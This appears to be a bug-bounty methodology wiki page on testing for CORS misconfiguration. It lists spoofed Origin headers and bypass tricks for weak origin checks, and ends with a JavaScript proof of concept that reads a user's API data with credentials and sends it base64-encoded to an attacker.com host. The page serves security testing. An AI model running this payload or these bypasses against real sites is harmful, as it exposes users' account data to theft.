====== CORS Misconfiguration ======

Misconfigured CORS allows attacker-controlled sites to make credentialed requests to the target.

===== Testing =====

Add an ''Origin'' header to every interesting request:

<code>
Origin: https://attacker.com
Origin: https://anythinghere-target.com
Origin: null
</code>

Check the response for:

<code>
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
</code>

Both headers together = exploitable.

===== Bypass Techniques =====

  * **Substring match** -- if they check ''if (strpos($origin, "target.com"))'', try ''https://attacker.com?x=target.com''
  * **Suffix match** -- try ''https://attackertarget.com''
  * **null origin** -- some sites allow ''null'' origin (sandbox iframes)
  * **Subdomain** -- find any XSS on any subdomain of the target; use it as the origin

===== PoC =====

<code html>
<script>
fetch('https://target.com/api/user', {credentials: 'include'})
  .then(r => r.text())
  .then(d => fetch('https://attacker.com/?d=' + btoa(d)));
</script>
</code>

===== Why It Matters =====

Even if an endpoint with CORS misconfiguration seems harmless, the same configuration pattern is often reused across the app. A read on a harmless endpoint proves the bypass -- then look for it on sensitive API calls.

===== See Also =====

  * [[zseano:xss|XSS Testing]]
  * [[tbhm:04_authorization|TBHM Auth & Session]]
  * [[zseano:start|Methodology Index]]